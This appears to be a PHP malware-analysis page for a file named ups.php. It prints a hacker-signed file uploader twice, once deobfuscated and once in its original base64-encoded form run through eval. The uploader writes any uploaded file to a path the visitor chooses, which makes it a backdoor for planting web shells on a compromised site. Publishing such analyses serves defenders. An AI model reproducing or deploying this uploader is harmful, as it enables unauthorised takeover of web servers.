PHP Malware Analysis

Back to list

Filename: ups.php

Tags

URLs
Title
  • File Uploader by An0n 3xPloiTeR
Input
  • _FILES
Files
  • move_uploaded_file

Deobfuscated code

<?php

$Uploader = "ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPkZpbGUgVXBsb2FkZXIgYnkgQW4wbiAzeFBsb2lUZVI8L3RpdGxlPgo8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cHM6Ly8xLmJwLmJsb2dzcG90LmNvbS8tbkEta2FvLXJlUEkvVjhoV01uX2dzV0kvQUFBQUFBQUFERlEvY1NBSXJyMWxnb0lHZlAzLUlrT1NhUmo4SE9pOEhMS0l3Q1BjQi9zMTYwMC8xNDE3MjAyMl8xMjc0MDE4Mzc3MTIzNzhfMTA3NjkyNDUyNF9uLmpwZyI+PC9oZWFkPjxib2R5Pgo8c3R5bGU+CmJvZHl7CmZvbnQtZmFtaWx5OiAiUmFjaW5nIFNhbnMgT25lIiwgY3Vyc2l2ZTsKYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKdGV4dC1zaGFkb3c6MHB4IDBweCAxcHggIzc1NzU3NTsKfQojY29udGVudCB0cjpob3ZlcnsKYmFja2dyb3VuZC1jb2xvcjogIzYzNjI2MzsKdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Cn0KI2NvbnRlbnQgLmZpcnN0ewpiYWNrZ3JvdW5kLWNvbG9yOiBzaWx2ZXI7Cn0KI2NvbnRlbnQgLmZpcnN0OmhvdmVyewpiYWNrZ3JvdW5kLWNvbG9yOiBzaWx2ZXI7CnRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KdGFibGV7CmJvcmRlcjogMXB4ICMwMDAwMDAgZG90dGVkOwp9Ckgxewpmb250LWZhbWlseTogIlJ5ZSIsIGN1cnNpdmU7Cn0KYXsKY29sb3I6Ymx1ZTsKdGV4dC1kZWNvcmF0aW9uOiBub25lOwp9CmE6aG92ZXJ7CmNvbG9yOiAjY2QwMGZmOwp0ZXh0LXNoYWRvdzowcHggMHB4IDEwcHggI2ZmZmZmZjsKfQppbnB1dCxzZWxlY3QsdGV4dGFyZWF7CmJvcmRlcjogMXB4ICMwMDAwMDAgc29saWQ7Ci1tb3otYm9yZGVyLXJhZGl1czogNXB4Owotd2Via2l0LWJvcmRlci1yYWRpdXM6NXB4Owpib3JkZXItcmFkaXVzOjVweDsKfQo8L3N0eWxlPgo8L0hFQUQ+CjxCT0RZPgo8SDE+PGNlbnRlcj48Zm9udCBjb2xvcj0icmVkIj5+fn48L2ZvbnQ+Q29kZWQgYnkgPGZvbnQgY29sb3I9InJlZCI+QTwvZm9udD5uMG4gM3g8Zm9udCBjb2xvcj0icmVkIj5QbG9pPC9mb250PlRlUjxmb250IGNvbG9yPSJyZWQiPn5+fjwvZm9udD4KPGJyPjxmb250IGNvbG9yPSJibHVlIj5+fn5QYWsgPGZvbnQgY29sb3I9InJlZCI+Q3liZXI8L2ZvbnQ+IEdob3N0c35+fjwvZm9udD4KIDwvY2VudGVyPjwvSDE+CjxjZW50ZXI+Cjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj4KICAgIDxpbnB1dCB0eXBlPXRleHQgbmFtZT1wYXRoPgoJPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVzIj4KCTxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVXBsb2FkIj4KPC9mb3JtPjwvYm9keT48L2NlbnRlcj48L2h0bWw+JzsKJGZpbGVzID0gQCRfRklMRVNbImZpbGVzIl07CmlmICgkZmlsZXNbIm5hbWUiXSAhPSAnJykgewogICAgJGZ1bGxwYXRoID0gJF9SRVFVRVNUWyJwYXRoIl0gLiAkZmlsZXNbIm5hbWUiXTsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVzWyd0bXBfbmFtZSddLCAkZnVsbHBhdGgpKSB7CiAgICAgICAgZWNobyAiPGNlbnRlcj48aDI+PGEgaHJlZj0nJGZ1bGxwYXRoJyB0YXJnZXQ9J19ibGFuayc+Q2xpY2sgdG8gYWNjZXNzIHVwbG9hZGVkIEZpbGU8L2E+PC9oMj48L2NlbnRlcj4iOwogICAgfQp9";
eval /* PHPDeobfuscator eval output */ {
    echo "<html><head><title>File Uploader by An0n 3xPloiTeR</title>\n<link rel=\"icon\" type=\"image/png\" href=\"https://1.bp.blogspot.com/-nA-kao-rePI/V8hWMn_gsWI/AAAAAAAADFQ/cSAIrr1lgoIGfP3-IkOSaRj8HOi8HLKIwCPcB/s1600/14172022_127401837712378_1076924524_n.jpg\"></head><body>\n<style>\nbody{\nfont-family: \"Racing Sans One\", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: \"Rye\", cursive;\n}\na{\ncolor:blue;\ntext-decoration: none;\n}\na:hover{\ncolor: #cd00ff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center><font color=\"red\">~~~</font>Coded by <font color=\"red\">A</font>n0n 3x<font color=\"red\">Ploi</font>TeR<font color=\"red\">~~~</font>\n<br><font color=\"blue\">~~~Pak <font color=\"red\">Cyber</font> Ghosts~~~</font>\n </center></H1>\n<center>\n<form method=POST enctype=\"multipart/form-data\" action=\"\">\n    <input type=text name=path>\n\t<input type=\"file\" name=\"files\">\n\t<input type=submit value=\"Upload\">\n</form></body></center></html>";
    $files = @$_FILES["files"];
    if ($files["name"] != '') {
        $fullpath = $_REQUEST["path"] . $files["name"];
        if (move_uploaded_file($files['tmp_name'], $fullpath)) {
            echo "<center><h2><a href='{$fullpath}' target='_blank'>Click to access uploaded File</a></h2></center>";
        }
    }
};
?>	


Original code

<?php
$Uploader = "ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPkZpbGUgVXBsb2FkZXIgYnkgQW4wbiAzeFBsb2lUZVI8L3RpdGxlPgo8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cHM6Ly8xLmJwLmJsb2dzcG90LmNvbS8tbkEta2FvLXJlUEkvVjhoV01uX2dzV0kvQUFBQUFBQUFERlEvY1NBSXJyMWxnb0lHZlAzLUlrT1NhUmo4SE9pOEhMS0l3Q1BjQi9zMTYwMC8xNDE3MjAyMl8xMjc0MDE4Mzc3MTIzNzhfMTA3NjkyNDUyNF9uLmpwZyI+PC9oZWFkPjxib2R5Pgo8c3R5bGU+CmJvZHl7CmZvbnQtZmFtaWx5OiAiUmFjaW5nIFNhbnMgT25lIiwgY3Vyc2l2ZTsKYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKdGV4dC1zaGFkb3c6MHB4IDBweCAxcHggIzc1NzU3NTsKfQojY29udGVudCB0cjpob3ZlcnsKYmFja2dyb3VuZC1jb2xvcjogIzYzNjI2MzsKdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Cn0KI2NvbnRlbnQgLmZpcnN0ewpiYWNrZ3JvdW5kLWNvbG9yOiBzaWx2ZXI7Cn0KI2NvbnRlbnQgLmZpcnN0OmhvdmVyewpiYWNrZ3JvdW5kLWNvbG9yOiBzaWx2ZXI7CnRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KdGFibGV7CmJvcmRlcjogMXB4ICMwMDAwMDAgZG90dGVkOwp9Ckgxewpmb250LWZhbWlseTogIlJ5ZSIsIGN1cnNpdmU7Cn0KYXsKY29sb3I6Ymx1ZTsKdGV4dC1kZWNvcmF0aW9uOiBub25lOwp9CmE6aG92ZXJ7CmNvbG9yOiAjY2QwMGZmOwp0ZXh0LXNoYWRvdzowcHggMHB4IDEwcHggI2ZmZmZmZjsKfQppbnB1dCxzZWxlY3QsdGV4dGFyZWF7CmJvcmRlcjogMXB4ICMwMDAwMDAgc29saWQ7Ci1tb3otYm9yZGVyLXJhZGl1czogNXB4Owotd2Via2l0LWJvcmRlci1yYWRpdXM6NXB4Owpib3JkZXItcmFkaXVzOjVweDsKfQo8L3N0eWxlPgo8L0hFQUQ+CjxCT0RZPgo8SDE+PGNlbnRlcj48Zm9udCBjb2xvcj0icmVkIj5+fn48L2ZvbnQ+Q29kZWQgYnkgPGZvbnQgY29sb3I9InJlZCI+QTwvZm9udD5uMG4gM3g8Zm9udCBjb2xvcj0icmVkIj5QbG9pPC9mb250PlRlUjxmb250IGNvbG9yPSJyZWQiPn5+fjwvZm9udD4KPGJyPjxmb250IGNvbG9yPSJibHVlIj5+fn5QYWsgPGZvbnQgY29sb3I9InJlZCI+Q3liZXI8L2ZvbnQ+IEdob3N0c35+fjwvZm9udD4KIDwvY2VudGVyPjwvSDE+CjxjZW50ZXI+Cjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj4KICAgIDxpbnB1dCB0eXBlPXRleHQgbmFtZT1wYXRoPgoJPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVzIj4KCTxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVXBsb2FkIj4KPC9mb3JtPjwvYm9keT48L2NlbnRlcj48L2h0bWw+JzsKJGZpbGVzID0gQCRfRklMRVNbImZpbGVzIl07CmlmICgkZmlsZXNbIm5hbWUiXSAhPSAnJykgewogICAgJGZ1bGxwYXRoID0gJF9SRVFVRVNUWyJwYXRoIl0gLiAkZmlsZXNbIm5hbWUiXTsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVzWyd0bXBfbmFtZSddLCAkZnVsbHBhdGgpKSB7CiAgICAgICAgZWNobyAiPGNlbnRlcj48aDI+PGEgaHJlZj0nJGZ1bGxwYXRoJyB0YXJnZXQ9J19ibGFuayc+Q2xpY2sgdG8gYWNjZXNzIHVwbG9hZGVkIEZpbGU8L2E+PC9oMj48L2NlbnRlcj4iOwogICAgfQp9"; eval(base64_decode($Uploader));
?>